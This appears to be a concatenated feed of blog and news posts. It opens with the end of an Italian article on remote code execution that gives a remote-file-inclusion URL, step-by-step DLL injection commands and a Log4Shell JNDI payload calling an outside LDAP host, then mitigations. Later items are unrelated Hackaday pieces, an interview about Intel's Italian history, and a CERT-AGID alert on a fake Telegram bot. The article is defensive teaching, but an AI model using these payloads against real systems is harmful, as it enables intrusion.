Per quanto riguarda il remote inclusion è ancora più semplice. Consiste nel caricare del contenuto remoto solitamente tramite un url. Se il server web è abilitato per includere risorse remote (allow_url_include=on), potremmo includere il codice mostrato prima per esempio su pastbin.

Quindi richiamarlo

example.local?page=https://pas…

DDL INJECTION

DLL injection è una tecnica che permette di eseguire codice arbitrario all’interno dello spazio di indirizzamento di un processo in esecuzione. Questo viene fatto caricando una DLL (Dynamic Link Library) nel processo target.

I principali passaggi sono:

Allocazione di memoria: Il processo iniettore alloca memoria nel processo target.
Scrittura del percorso della DLL: Il percorso della DLL da iniettare viene scritto nella memoria allocata.
Caricamento della DLL: Viene chiamata la funzione LoadLibrary per caricare la DLL nel processo target.

Un esempio reale è la CVE-2020-7315. La vulnerabilità affligge McAfee Agent (MA) per Windows precedente alla versione 5.6.6 e consente agli utenti locali di eseguire codice arbitrario tramite l’utilizzo di una DLL dannosa.

La causa è una DDL mancante nel percorso C:\Windows\System32\ che il processo di McAfee macompatsvc.exe tenta di caricare all’avvio.

Quindi un attaccante posizionando in quel percorso una nuova DLL malevola, può eseguire da parte del eseguibile del codice malevolo al riavvio del processo.

Un altro attacco più sofisticato è quello di utilizzare degli injector che attraverso le API VirtualAllocEx, WriteProcessMemory, e CreateRemoteThread caricando dinamicamente una DLL in un processo già attivo.

In un sistema vulnerabile dopo averlo compromesso, basterebbe identificare un PID di un processo target. Quindi è necessario forgiare una DLL malevola e iniettarla con un injector.

A grandi linee il processo è questo:

• Con tasklist identificare il PID target (es 3456)
• Compilare injector e la DLL
• Eseguire dllinj.exe 3456
• A questo punto la DLL è stata caricata ed eseguita

Qui degli esempi di DLL Injector e payload:

DLL Injector

github.com/PacktPublishing/Mal…

DDL Payload

github.com/PacktPublishing/Mal…

Questa tecnica può rappresentare una minacce significativa, specialmente per i sistemi mal configurati e legacy. Questi sistemi spesso mancano delle patch di sicurezza e delle configurazioni necessarie per difendersi da attacchi così sofisticati, oppure degli EDR che rilevino abuso di queste API da parte dei processi.

L’utilizzo di queste api come VirtualAlloc lo avevamo visto nell’analisi del infostealer Tesla Agent.

redhotcyber.com/post/rhc-da-vi…

Common Vulnerabilities and Exposures (CVEs)

Sfruttare determinati CVE è un altro metodo per ottenere l’esecuzione di codice remoto. Le aziende dietro i programmi bug bounty integrano servizi e pacchetti di terze parti (come librerie e framework) tutto il tempo, poiché possono accelerare lo sviluppo e ridurre i costi di tecnologia generali ad esso associati.

Ma questo ha un altro costo: questi servizi integrati possono spesso contenere codice non sicuro che possono portare a RCE. Prendiamo ad esempio Log4J (CVE-2021-44228), un semplice payload come quello qui sotto avrebbe potuto avere un impatto su qualsiasi server che utilizza Apache Log4J, come ad esempio i sistemi di virtualizzazione Vmware.

${jndi:ldap://url.com/exploit}

Come mitigare gli attacchi RCE?

Esistono differenti metodi per mitigare gli impatti di una Remote Code Execution, di seguito ne analizzeremo alcuni.

Validazione e sanificazione degli input

• Validare gli input: Applicare controlli rigorosi su tutti i dati forniti dagli utenti, verificando che rispettino il formato, la lunghezza e il tipo di dato atteso. Non fidarsi mai della validazione lato client e validare sempre sul server.Don’t trust, verify.
• Sanificare gli input: Oltre alla validazione, è necessario ripulire o codificare i dati in input per neutralizzare eventuali caratteri o sequenze dannose.

Pratiche di codifica sicura

• Query parametrizzate (Prepared Statement): Fondamentale per prevenire SQL Injection. Non concatenare mai input dell’utente direttamente nelle query SQL.
• Evitare eval() (e funzioni simili): Queste funzioni eseguono codice arbitrario e sono estremamente pericolose se coinvolgono input dell’utente. Quasi sempre esistono alternative più sicure.
• Principio del minimo privilegio: Concedere solo i permessi necessari a utenti e processi. Limitare inoltre l’accesso a risorse e funzionalità sensibili.
• Gestione sicura delle sessioni: Utilizzare ID di sessione robusti, implementare timeout di sessione adeguati e rigenerare l’ID di sessione dopo il login.
• Gestione degli errori: evitare di rivelare informazioni sensibili nei messaggi di errore. Registrare gli errori per il debug, ma presentare messaggi di errore generici agli utenti.

Gestione delle dipendenze e patch

Mantenere il software aggiornato: Aggiornare regolarmente software, librerie, framework e sistemi operativi con le patch di sicurezza più recenti, incluse le dipendenze di terze parti. Scansione delle vulnerabilità: Utilizzare strumenti per identificare vulnerabilità note nelle dipendenze.

Processo di gestione delle patch: Implementare un processo formale per tracciare, testare e applicare le patch di sicurezza.

Deserializzazione sicura

Evitare la deserializzazione di dati non attendibili: Se possibile, evitare di deserializzare dati provenienti da fonti non attendibili. Validare i dati deserializzati: Se la deserializzazione è necessaria, convalidare la struttura e il contenuto degli oggetti deserializzati prima di utilizzarli.

Utilizzare librerie di deserializzazione sicure: Utilizzare librerie progettate per prevenire vulnerabilità di deserializzazione.

Sicurezza della memoria

• Protezione da Buffer Overflow: Utilizzare tecniche appropriate per prevenire buffer overflow, come il controllo dei limiti e funzioni di gestione delle stringhe sicure.
• Linguaggi memory-safe: Considerare l’utilizzo di linguaggi di programmazione memory-safe (ad esempio, Rust, Go) quando possibile, poiché offrono protezione integrata contro molte vulnerabilità legate alla memoria.

Web Application Firewall (WAF)

Implementare un WAF: Un WAF può aiutare a rilevare e bloccare traffico dannoso, inclusi tentativi di sfruttare vulnerabilità RCE e addirittura 0day.

È un importante livello di difesa e prevenzione, ma non sostituisce le pratiche di codifica sicura e tutte quelle citate precedentemente!

Gestione sicura dei file

• Validare gli upload di file: Convalidare rigorosamente tipi di file, dimensioni e contenuto. Non fidarsi solo dell’estensione del file
• Archiviare i file caricati in modo sicuro: Archiviare i file caricati al di fuori della root web e utilizzare permessi di file appropriati per impedirne l’esecuzione.
• Disabilitare la navigazione delle directory: Impedire agli utenti di navigare nelle directory contenenti i file caricati.

Esecuzione di Test di sicurezza

• Analisi statica: Utilizzare strumenti di analisi statica del codice per identificare potenziali vulnerabilità nel codice sorgente prima che venga distribuito.
• Analisi dinamica (DAST): testare l’applicazione in esecuzione per identificare vulnerabilità.
• Penetration testing: Simulare attacchi reali per scoprire debolezze di sicurezza.
• Revisioni del codice: Condurre revisioni del codice regolari per identificare e risolvere problemi di sicurezza.
• Analisi della composizione del software (SCA): Analizzare le dipendenze dell’applicazione per identificare vulnerabilità note.

Rafforzare le protezioni della memoria dei processo:

• Control Flow Guard: Utilizzare il Control Flow Guard (CFG) per prevenire il dirottamento.
• DEP e ASR: Abilitare la prevenzione dell’esecuzione dei dati (DEP) e la randomizzazione del layout dello spazio degli indirizzi (ASLR) per randomizzare gli indirizzi di memoria e impedire l’iniezione.

Utilizzare EDR efficaci

• Monitor API: utilizzare degli EDR che monitorano chiamate alle API VirtualAllocEx, WriteProcessMemory, CreateRemoteThreadsospette dai processi.

Altre considerazioni

• Intestazioni di sicurezza: Utilizzare intestazioni di sicurezza (ad esempio, Content Security Policy (CSP), HTTP Strict Transport Security (HSTS)) per mitigare vari tipi di attacchi lato browser.
• Limitazione frequenza dei login: Limitare la frequenza con cui un attaccante possa eseguire continui tentativi di login per prevenire attacchi brute-force.
• Logging e monitoraggio: Registrare eventi relativi alla sicurezza e monitorare i sistemi per attività sospette. Impostare avvisi per potenziali attacchi.
• Piano di risposta agli incidenti: Avere un piano in atto su come rispondere agli incidenti di sicurezza.

Conclusione

Le vulnerabilità che portano ad una RCE sono questioni veramente serie e sono più diffuse di quanto si vorrebbe. Quando si realizza una applicazione o dei sistemi client-server, bisognerebbe sempre seguire le buone pratiche sia in fase di progettazione che di realizzazione ma anche prima di metterla in produzione e durante il mantenimento nel tempo.

Una raccomandazione è quella di monitorare costantemente le vulnerabilità attraverso anche community come RedHotCyber e tramite i comunicati dei produttori dei software (in cui molte volte è possibile iscriversi per ricevere i loro comunicati). Anche Agenzia per la cybersicurezza nazionale, come possiamo leggere dalle FAQ, monitora e invia preventivamente informazioni sulle minacce emergenti e relative attività di mitigazione attraverso i suoi canali pubblici.

Possiamo quindi seguire il loro canale Telegram al link https://t.me/s/CSIRT_Italia
Un altro canale interessante è quello del cert agid al link t.me/certagid

L'articolo Alla scoperta della Remote Code Execution (RCE). Il bug di sicurezza più temuto! proviene da il blog della sicurezza informatica.

The toaster is a somewhat modest appliance that is often ignored until it stops working. Many cheap examples are not made to be easily repaired, but [Kasey Hou] designed a repairable flat pack toaster.

[Hou] originally planned to design a repairable toaster to help people more easily form an emotional attachment with the device, but found the process of disassembly for existing toasters to be so painful that she wanted to go a step further. By inviting the toaster owner into the process of assembling the appliance, [Hou] reasoned people would be less likely to throw it out as well as more confident to repair it since they’d already seen its inner workings.

Under the time constraints of the project, the final toaster has a simpler mechanism for ejecting toast than most commercial models, but still manages to get the job done. It even passed the UK Portable Appliance Test! I’m not sure if she’d read the IKEA Effect before running this project, but her results with user testing also proved that people were more comfortable working on the toaster after assembling it.

It turns out that Wikipedia couldn’t tell you who invented the toaster for a while, and if you have an expensive toaster, it might still be a pain to repair.

hackaday.com/2025/03/02/flat-p…

Un’intervista esclusiva a Ettore Accenti. Pioniere dei pionieri della rivoluzione tecnologica in Italia. Ingegnere e imprenditore, ha segnato la storia dell’informatica italiana. Fondatore di Eledra 3S negli anni ’60, ha portato i microprocessori Intel in Italia negli anni ’70 e reso accessibili i computer Amstrad negli anni ’80, collaborando con aziende leader del settore.

Ho incontrato Ettore Accenti, ingegnere e fondatore di Amstrad Italia, in un grigio pomeriggio di febbraio. La nostra chiacchierata si è subito trasformata in un viaggio storico: un racconto che inizia a Milano, alla fine degli anni Sessanta, attraversa gli Ottanta e arriva ai giorni nostri, testimoniando in prima persona gli eventi che hanno forgiato la Silicon Valley.

La nascita dell’industria elettronica, lo sviluppo tecnologico e le storie di visionari che trasformarono la Valle di Santa Clara nel Sancta Sanctorum della tecnologia. Decisioni rivoluzionarie – come quella di Intel di abbandonare le memorie per concentrarsi sui microprocessori – vennero prese nelle stanze “segrete” dei colossi del settore, plasmando il futuro digitale. Scienziati, inventori e trilioni di dollari hanno catapultato il mondo nella rivoluzione informatica, partendo da una terra un tempo dominata da frutteti. In sole due ore di intervista, Accenti mi ha trasportato, con il pathos del suo racconto, in quegli ambienti, facendomi scoprire storie e persone che altrimenti sarebbero rimaste nell’ombra.

L’ingegnere Accenti incarna le qualità esemplari degli italiani: l’intraprendenza milanese, l’anarchia creativa napoletana, la tenacia dei meridionali e l’ingegno di una consorte siciliana. Questo mix spiega i suoi successi, nonostante un contesto spesso poco favorevole. Ma come ebbe inizio questa avventura? Scopriamolo insieme.

Nato a Milano in una famiglia di ingegneri, coltivò fin da piccolo una passione viscerale per la tecnologia, accompagnata dall’amore per la fotografia. Dopo il liceo, all’Istituto Zaccaria, si iscrisse al Politecnico di Milano. La scintilla definitiva si accese durante le scuole medie, quando, leggendo un libricino divulgativo, scoprì le onde hertziane e realizzò il suo primo ricevitore radio.

Negli anni in cui, all’Università di Berkeley, prendeva forma il movimento del Sessantotto – che in Italia culminò con l’autunno caldo – Accenti, a Milano, saldava transistor, replicando in piccolo la rivoluzione tecnologica d’oltreoceano. Collaborando con una rivista di elettronica, si immerse nello studio dei semiconduttori, i materiali alla base dei transistor che di lì a poco avrebbero sostituito le ingombranti valvole termoioniche. Fu così che ebbe inizio la sua missione: trasformare l’Italia da spettatrice a protagonista dell’era dei microchip.

Per colmare le lacune dell’editoria hobbistica, utilizzò le “replay card” – cartoline prestampate per richiedere dati tecnici alle aziende -. Grazie a questo sistema, ottenne manuali e componenti da aziende come Philips e SGS, realizzando progetti pionieristici. Ma il salto definitivo arrivò con Intel.
Ing. Ettore Accenti
Carlo: Ingegnere, come iniziò la collaborazione con Intel?

Accenti: Nell’agosto del 1969, leggendo la rivista Electronics, scoprii la neonata Intel, fondata da Robert Noyce e Gordon Moore a Mountain View. Da amministratore di Eledra 3S, inviai una lettera – scritta dalla mia segretaria, futura moglie e studentessa alla Bocconi – per propormi come loro rappresentante in Italia.

Carlo: Parliamo di Robert Noyce, co-inventore del circuito integrato, e di Gordon Moore, padre dell’omonima legge?

Accenti: Esatto. Dopo mesi di silenzio, mi chiamò Jean Paulsen di Intel Europa. Organizzammo un incontro a Milano e, nonostante le titubanze iniziali, ottenni un periodo di prova di tre mesi e la documentazione per due prodotti: la memoria i3101 e la Silicon-MOS da 256 bit.

Legge di Moore, Steve Jurvetson

Carlo: Ha conosciuto i giganti dell’informatica?

Accenti: Certo. Oltre agli affari, volevo scoprire le persone dietro i nomi, le cui storie sono leggendarie. Conosci la vicenda di Noyce e Moore?

Carlo: Racconti Ingegnere.

Accenti: William Shockley, premio Nobel per la Fisica nel 1956, lasciò i Bell Labs nel 1955 per fondare a Mountain View la Shockley Semiconductor. Tra i primi assunti vi furono Gordon Moore (chimico) e Robert Noyce (fisico), che nel 1957 abbandonarono l’azienda insieme ad altri sei colleghi, gruppo noto come gli “8 traditori”, per fondare la Fairchild Semiconductor. Nel 1968, Noyce e Moore lasciarono anche Fairchild per creare Intel. Altri ex Fairchild, come Jerry Sanders, fondarono AMD nel 1969, mentre National Semiconductor, esistente dal 1959, reclutò talenti proprio da Fairchild.
Per gentile concessione dell’Ing. Ettore Accenti
Carlo: Avviata la collaborazione, è mai volato in America, alla sede di Intel?

Accenti: Sì, già nel primo anno andai in California per incontrare i fondatori di Intel. Partecipai anche a incontri in Italia con dirigenti della stessa azienda, ma l’esperienza più significativa fu quella a Mountain View.

Carlo: Chi incontrò alla Intel?

Accenti: Oltre a Noyce e Moore, incontrai Bob Graham, il marketing manager. In Italia, negli uffici della mia azienda, ricevetti visite da Mike Markkula, Ted Hoff e Stan Mazor.

Carlo: Markkula è una figura chiave. Quale ruolo ricopriva?

Accenti: Markkula era sales manager di Intel, ma la svolta arrivò nel 1976, quando investì 250.000 dollari in Apple, salvando Jobs e Wozniak dal fallimento. Senza di lui, Apple come la conosciamo oggi forse non esisterebbe.

Carlo: All’inizio Intel produceva memorie, non processori. Si imbatté in problemi tecnici?

Accenti: Esatto. All’epoca il Dr. Faggin non era ancora arrivato in Intel. Come per ogni innovazione, non mancarono intoppi. Hai mai sentito parlare del “Soft Error”? Alcune aziende, come Honeywell, sostituivano le vecchie memorie magnetiche con i nostri chip, più compatti ed efficienti. Seguivo personalmente i test fino alla consegna al cliente, ma Honeywell iniziò a restituire le i1103, giudicate difettose. Sostituivo i chip e li inviavo per analisi, mentre Intel li dichiarava funzionanti. Dopo sei mesi, scoprimmo che il problema era causato dai raggi cosmici, particelle che, attraversando l’atmosfera, alteravano la carica elettrostatica dei chip, trasformando un bit da 1 a 0. La soluzione fu schermare i chip dalle radiazioni.

Carlo: Raggi cosmici? Incredibile. E in Italia, come reagì il mercato?

Accenti: Distribuivo memorie Intel a clienti come Olivetti, Siemens e Selenia. Il mercato italiano era strategico per loro: i dirigenti Intel venivano spesso qui. Ricordo un episodio esilarante.

Carlo: Lo Racconti!

Accenti: Nel 1970, accompagnai Gordon Moore, Ed Gelbach e Tom Lawrence alla Olivetti di Ivrea. Ero alla guida della mia Alfa Giulietta a 160 km/h sull’autostrada Milano-Torino, quando udii dal sedile posteriore gridare: “Ettore!!! Se non rallenti ti togliamo la rappresentanza! In questa auto stai trasportando metà del quartier generale Intel!”
Per gentile concessione dell’Ing. Ettore Accenti
Carlo: Intel, da pioniera, ha sempre avuto successo?

Accenti: Negli anni ’70, con il mercato delle memorie saturo e la concorrenza in crescita, Intel cercò nuovi sbocchi puntando sul settore degli orologi al quarzo. Acquistò la “Microma”, un’azienda specializzata in orologi elettronici a cristalli liquidi. Robert Noyce mi mostrò il suo primo orologio al quarzo, con una precisione di pochi secondi all’anno e un design futuristico, ma a 200 dollari si rivelò un cattivo affare. Io, con Eledra 3S, ne acquistai un lotto ma il progetto fallì.

Carlo: E con Apple? Collaborò con Steve Jobs?

Accenti: Nel 1979 incontrai Mike Markkula, ex Intel e investitore di Apple,allora CEO dell’azienda della “mela morsicata”. Avviammo una partnership per l’Apple II in Italia evitando conflitti con Iret, l’altro distributore italiano. L’Apple II decollò, mentre l’Apple III, causa circuiti difettosi e problemi di surriscaldamento non ebbe il successo meritato. Nel 1983, con Jobs emarginato e le attività sospese, intentammo una causa che si concluse con un accordo vantaggioso. Deluso, riorientai le attività verso nuove collaborazioni, trasformando la sede Apple di Milano in una divisione “Computer Professionali” e, nel 1984, raddoppiammo il fatturato.

Carlo: Qual è stato il giro d’affari di Eledra 3S?

Accenti: Nel 1984 il Gruppo Eledra raggiunse un fatturati di svariati miliardi di lire.

Carlo: Incredibile! Ma tornando a Intel, non abbiamo ancora menzionato i suoi prodotti di punta: i microprocessori.

Accenti: Durante la mia visita nel 1970 allo stabilimento Intel di Mountain View, dopo aver sottoscritto un patto di riservatezza, il Dr. Moore e il Dr. Noyce mi mostrarono un prototipo rivoluzionario: una ROM cancellabile con raggi UV. Il Dr. Dov Frohman, il suo inventore, me ne illustrò il funzionamento.

Carlo: Quindi assistette alla nascita delle EPROM?

Accenti: Sì. Quel prototipo divenne l’EPROM i1702 da 256 bit. All’epoca, Faggin era appena arrivato in Intel dalla Fairchild, e il microprocessore non era ancora stato realizzato. Il mercato restava quello delle memorie.

Carlo: Ma quando nacque il primo microprocessore Intel?

Accenti: Nel 1971, con l’Intel 4004, creato da Faggin, Hoff e Mazor. Inizialmente fu sottovalutato: i volumi di vendita erano irrisori rispetto alle memorie. Addirittura, Intel lo offriva come bonus per incentivare gli ordini di chip! La svolta arrivò nel 1986, quando Andy Grove, presidente di Intel, in vacanza in Austria, decise di abbandonare la produzione di memorie per concentrarsi esclusivamente sulla produzione di microprocessori.
Per gentile concessione dell’ing. Ettore Accenti
Carlo: Quindi fu sufficiente questo passaggio per far diventare Intel un colosso?

Accenti: Non solo. Il Crush Program, ideato dal capo marketing Bill Davidow, fu decisivo. Negli anni ’80, Intel era in crisi: Motorola dominava con il suo 68000 e Zilog, fondata da Faggin dopo aver lasciato Intel, con lo Z80. I clienti preferivano le loro CPU a 16 bit rispetto alle nostre a 8 bit (8008, 8080, 8085). Nove su dieci sceglievano i rivali.

Carlo: E come reagì Intel?

Accenti: Con il Crush Program: un piano segreto per annientare la concorrenza. Mobilitammo tutti, dai distributori come Eledra 3S fino ai vertici, come Grove. Per clienti strategici, quali Olivetti, organizzammo squadre pronte a intervenire in 24 ore. L’obiettivo era presentarci come partner di sistema, non solo fornitori. Rivelammo una roadmap con la serie x86 (286, 386, 486… Pentium), software retro compatibili, ma ancora su carta. Un azzardo geniale: promettemmo compatibilità futura per ridurre i costi di sviluppo.

Carlo: Ma come riuscì Intel a convincere i suoi clienti con prodotti inesistenti?

Accenti: Con la fiducia. Intel aveva già creato board prototipali e sistemi di sviluppo. Svelammo i piani x86 sotto accordi di riservatezza. I tecnici dovettero realizzare ciò che il marketing aveva promesso. E ci riuscirono: in un anno conquistammo 2.000 clienti, il doppio del previsto. Olivetti adottò l’8086, mentre Motorola e Zilog furono colte alla sprovvista. Quella visione trasformò Intel nel gigante di oggi.

Carlo: Passiamo a un altro successo: la nascita di Amstrad Italia. Quali sfide affrontò in quel periodo?

Accenti: Nel 1987, noi distributori navigavamo a vista. L’aumento della concorrenza giapponese e la decisione dei produttori di aprire filiali dirette nei principali Paesi ci resero la vita difficile. In Italia, la svalutazione della lira, il finanziamento del credito clienti e un tasso di cambio del dollaro sfavorevole ci costringevano a grandi sacrifici. Olivetti, nel 1983 manifestò interesse per la mia azienda, quindi valutai una joint venture. L’accordo si concretizzò solo nel luglio 1986, anno di crisi globale: Olivetti, grazie ad un aumento di capitale, entrò in Eledra come partner con il 49%, ma fraintese il nostro modello di business. Eravamo un distributore di servizi, non un trader. I prezzi erano fissati dai contratti con i produttori, e il nostro guadagno derivava da accrediti fissi, non dalla speculazione.

Carlo: Cosa portò al collasso della joint venture?

Accenti: Continuarono i conflitti: mi accusarono di non saper “acquistare”, confondendo i contratti di accredito con la compravendita. Olivetti pretese liquidazioni insensate e bloccò persino un’offerta di salvataggio da un grande distributore internazionale, chiedendomi le dimissioni.

Carlo: Ma come la fenice è rinato dalle ceneri della sua azienda!

Accenti: Rifiutai una proposta tedesca e scelsi Alan Sugar per lanciare Amstrad in Italia. Fu un’avventura intensa di tre anni, seguita da altri tre come vicepresidente di Memorex-Telex.

Carlo: In quanto tempo organizzò Amstrad Italia e quali risultati raggiunse?

Accenti: Dopo aver lasciato Eledra, creai Amstrad Italia da zero in solo tre mesi. In tre anni raggiungemmo un fatturato di centinaia di miliardi di lire, dimostrando che l’innovazione poteva vincere anche in un mercato turbolento.

Carlo: Siamo giunti alla conclusione dell’intervista. La ringrazio per il tempo che ci ha dedicato. Vorrei porle un’ultima domanda: avendo conosciuto, collaborato, e stretto amicizia con figure storiche dell’informatica come Gordon Moore, Robert Noyce, Mike Markkula, Steve Jobs e Steve Wozniak, potrebbe condividere con noi un tratto distintivo della loro personalità?

Accenti: Steve Jobs era un visionario e un genio del marketing, capace di anticipare i desideri delle persone. Tuttavia, poteva risultare divisivo nella leadership e necessitava del supporto tecnico di Steve Wozniak, il vero genio dietro i primi computer Apple. Robert Noyce, invece, era sobrio e accessibile, combinando un rigoroso approccio scientifico con una rara umanità. Mike Markkula riconobbe subito il potenziale dell’Apple II e contribuì significativamente alla crescita di Apple, investendo personalmente e fornendo una guida strategica all’azienda.

Carlo: E per restare in tema, ha conosciuto anche Jack Tramiel, vero?

Accenti: Sì. La mia azienda fu tra i principali distributori del Commodore 64. In quegli anni, fatturammo diversi miliardi di lire grazie a quel modello. Tramiel mi invitò, insieme alla mia famiglia, a Los Angeles per una cena di lavoro, accompagnato dal suo direttore commerciale.

Carlo: Ingegnere, non posso che ringraziarla a nome mio e del pubblico che leggerà questa intervista, tanto piacevole quanto ricca di spunti.

Oggi, l’ingegnere Ettore Accenti, oltre a vantare un glorioso passato, è attivo come consulente per piccole e medie imprese, collabora con diverse Università e scrive articoli e libri, disponibili per l’acquisto sulle principali piattaforme online

L'articolo Dalla Eledra 3S a Intel: l’ingegnere italiano che portò l’Italia nella rivoluzione dei semiconduttori proviene da il blog della sicurezza informatica.

Last year, Nintendo has released the Alarmo, a bedside-style alarm clock with a colourful display. Do you own one? You deserve full control over your device, of course. [KernelEquinox] has been reverse-engineering an Alarmo ever since getting one, and there’s no shortage of cool stuff you’ll be able to do with an Alarmo thanks to this work.

Now, just how can you improve upon the Alarmo? Looking through the Alarmo dev community site and threads on the subreddit, there are plenty of ideas, from themes to a ton of possible behaviour tweaks! In particular, Nintendo has already changed Alarmo’s behaviour in a way that is jarring to some users – a third-party development community will help us all make sure our Alarmos work exactly like we expect them to. Want to replace the sound files, tie your Alarmo into your smart home setup, write your apps, tweak the UI or default behaviour, fix a bug that irks you real bad, or access a debug menu? Or, ensure that Alarmo doesn’t contribute to light pollution in your room? All appears to be doable.

Like the Alarmo, but don’t own one yet? They’re limited-release for now, but it will be more widely available this March; we thank [KernelEquinox] for the work in making Alarmo hacker-friendly. If you’ve forgotten, this project started off thanks to the efforts of [Gary] last year. We covered it back then — cat pictures included!

hackaday.com/2025/03/02/making…

It’s been quite a week for asteroid 2024 YR4, which looked like it was going to live up to its “city killer” moniker only to be demoted to a fraction of a percent risk of hitting us when it swings by our neighborhood in 2032. After being discovered at the end of 2024, the 55-meter space rock first popped up on the (figurative) radar a few weeks back as a potential risk to our home planet, with estimates of a direct strike steadily increasing as more data was gathered by professional and amateur astronomers alike. The James Webb Space Telescope even got in on the action, with four precious hours of “director’s discretionary” observation time dedicated to characterizing the size and shape of the asteroid before it gets too far from Earth. The result of all this stargazing is that 2024 YR4 is now at a Level 1 on the Torino Scale of NEO collision risk, with a likely downgrade to 0 by the time the asteroid next swings through again in 2028. So, if like us you were into the whole “Fiery Space Rock 2032” thing, you’ll just have to find something else to look forward to.

On the other hand, if you’re going to go out in a fiery cataclysm, going out as a trillionaire wouldn’t be a bad way to go. One lucky Citibank customer could have done that if only an asteroid had hit during the several hours it took to correct an $81 trillion credit to their account back in April, a mistake that only seems to be coming to light now. You’d think a mistake 80% the size of the global economy would have caused an overflow error somewhere along the way, or that somebody would see all those digits and think something was hinky, but apparently not since it was only the third person assigned to review the transaction that caught it. The transaction, which falls into the “near-miss” category, was reversed before any countries were purchased or fleets of space yachts were commissioned, which seems a pity but also points out the alarming fact that this happens often enough that banks have a “near-miss” category — kind of like a Broken Arrow.

We all know that near-Earth space is getting crowded, with everyone and his brother launching satellite megaconstellations to monetize our collective dopamine addiction. But it looks like things are even starting to get crowded around the Moon, at least judging by this lunar photobomb. The images were captured by the Lunar Reconnaisance Orbiter, which has been orbiting the Moon and studying the landscape for the last 16 years but stretched its capabilities a bit to capture images of the South Korean Danuri. The two probes are in parallel orbits but opposite directions and about 8 kilometers apart at the time, meaning the relative velocity between the two was an unreasonably fast 11,500 km/h. The result is a blurred streak against the lunar surface, which isn’t all that much to look at but is still quite an accomplishment. It’s not the first time these two probes have played peek-a-boo with each other; back in 2023, Danuri took a similar picture when LRO was 18 kilometers below it.

We don’t do much air travel, but here’s a tip: if you want to endear yourself to fellow travelers, it might be best to avoid setting up a phone hotspot named “I Have a Bomb.” That happened last week on American Airlines flight 2863 from Austin, Texas to Charlotte, North Carolina, with predictably results. The prank was noticed while the flight was boarding, causing law enforcement officers to board the plane and ask the prankster to own up to it. Nobody volunteered, so everyone had to deplane and go back through screening, resulting in a four-hour delay and everyone missing their connections. We’re all for fun SSIDs, mind you, but there’s a time and a place for everything.

And finally, we wanted to share this fantastic piece from Brian Potter over at Construction Physics on “Why it’s so hard to build a jet engine.” The answer might seem obvious — because it’s a jet engine, duh — but the article is a fascinating look at the entire history of jet propulsion, from their near-simultaneous invention by the principal belligerents at the end of World War II right through to their modern incarnations. The article is an exploration into the engineering of complex systems, and shows how non-obvious the problems were that needed to be solved to make jet engines practical. It’s also a lesson in the difficulties of turning a military solution into a practical commercial product. Enjoy!

hackaday.com/2025/03/02/hackad…

What is a sensory weaver? [Curiosiate] tells us: “A device which takes sensory data feeds in and converts it in various ways on the body as information streams as though a native sensory input.” As an example, they’ve built one.

This one, called “MK2 Lockpick” is a wrist-mounted array of linear actuators, with a lengthy design/build log to peek into. We don’t get PCB files (blame EasyEDA’s sharing), but we do at least get a schematic and more than enough pictures for anyone interested to reproduce the concept – the levels of bespoke-ness here warrant a new PCB for any newcomers to sensory weaver building, anyway. We also get a story of a proof-of-concept thermal input sensory weaver. The team even includes a lessons learned da, and plenty of inspiration throughout the posts on the blog.

This kind of tech is getting more and more popular, and we are sure there will be more to come — especially as we keep getting cool new gadgets like linear actuators in form of replacement parts. For instance, the actuators in this sensory weaver are harvested from Samsung S23 smartphones, and you could probably find suitable ones as iPhone replacement parts, too. Looking to start out in this area but want a quick build? Look no further than the venerable compass belt.

hackaday.com/2025/03/02/on-sen…

Oggi sono rientrato da Malaga.

Malaga è Spagna, è Europa, e io amo l'Europa: unita, comune a tutti noi e - mi auguro - da ora in poi più forte.

Anche l'Italia è Europa, ma da qualsiasi Paese io provenga, ogni volta che ci ritorno, che ritorno a casa, ho un'impressione pessima del nostro Paese, che dura qualche ora, a volte un giorno o 2, perché ho ancora gli occhi dell'esploratore. Quelli del cittadino che vive qui ci mettono un po', a tornare.

Con quegli occhi vedo un Paese decadente, triste, che cade letteralmente in pezzi, mentre il resto dell'Europa va avanti.

E' vero, in alcuni Paesi europei sto meglio che in Italia, per i miei problemi di salute, ma non è solo questo. Parlo della qualità delle strade, dei trasporti, di cosa vedi quando ti guardi in giro: piste ciclabili, panorami urbani, lungomare, autostrade, aeroporti, eccetera.

Certo, ci sono anche ell'estero posti come quelli che ho appena descritto, ma ho la netta sensazione che nel nostro Paese tutti questi problemi siano...più densi, più presenti.

Se viaggiate spesso in Europa, vi chiedo: sono pazzo io o anche voi avete questa sensazione?

Perfectly clear ice spheres are nifty but can be a bit tricky to make without an apparatus. [Seth Robinson] crafted a copper ice press to make his own.

Copper is well-known for its thermal conductivity, making it a perfect material for building a press to melt ice into a given shape. Like many projects, a combination of techniques yields the best result, and in this case we get to see 3d printing, sand casting, lost PLA casting, lathe turning, milling, and even some good old-fashioned sanding.

The most tedious part of the process appears to be dip coating of ceramic for the lost PLA mold, but the finished result is certainly worth it. That’s not to say that any of the process looks easy if you are a metal working novice. Taking over a week to slowly build up the layers feels a bit excruciating, especially compared to 3D printing the original plastic piece. If you’re ever feeling discouraged watching someone else’s awesome projects, you might want to stick around to the end when [Robinson] shows us his first ever casting. We’d say his skill has improved immensely over time.

If you’re looking for something else to do with casting copper alloys, be sure to checkout this bronze river table or [Robinson’s] copper levitation sphere.

Thanks to [DjBiohazard] for the tip!

youtube.com/embed/vXC_rSEwnGI?…

hackaday.com/2025/03/02/make-i…

Safeguard è un noto servizio, concepito per garantire la sicurezza delle transazioni nel mercato delle criptovalute, accessibile tramite la piattaforma di messaggistica Telegram.

Tuttavia, la sua recente popolarità ha attirato l’attenzione dei criminali informatici, che stanno creando bot fraudolenti su Telegram per ingannare le vittime portando all’installazione di malware o al furto dell’accesso ai loro account.

Una recente analisi ha rivelato l’esistenza di un falso bot di Safeguard che, una volta avviato, richiede all’utente di seguire tre passaggi come ulteriore verifica. L’obiettivo di questa truffa è eseguire codice PowerShell, sfruttando una tecnica già osservata per diffondere il malware Lumma Stealer.

In questi giorni il CERT-AGID ha avuto evidenza di un dominio, di recente registrazione, denominato safeguard-telegram. Questa pagina è collegata a due bot Telegram attualmente attivi, il cui obiettivo è indurre le vittime a scansionare un QR code per abilitare l’accesso da un nuovo dispositivo. In questo modo, la vittima concede ai criminali l’accesso al proprio account.

Il collegamento con lo smishing INPS

Il dominio in questione espone pubblicamente alcune pagine contenenti informazioni sulla configurazione, tra cui il vero indirizzo IP del server che ospita il servizio di truffa.

L’indirizzo IP riportato nel file XML, accessibile tramite browser, risulta, secondo Virustotal, collegato a due domini: inps[.]ec e inps[.]io quest’ultimo già rilevato ed analizzato nel recente comunicato.

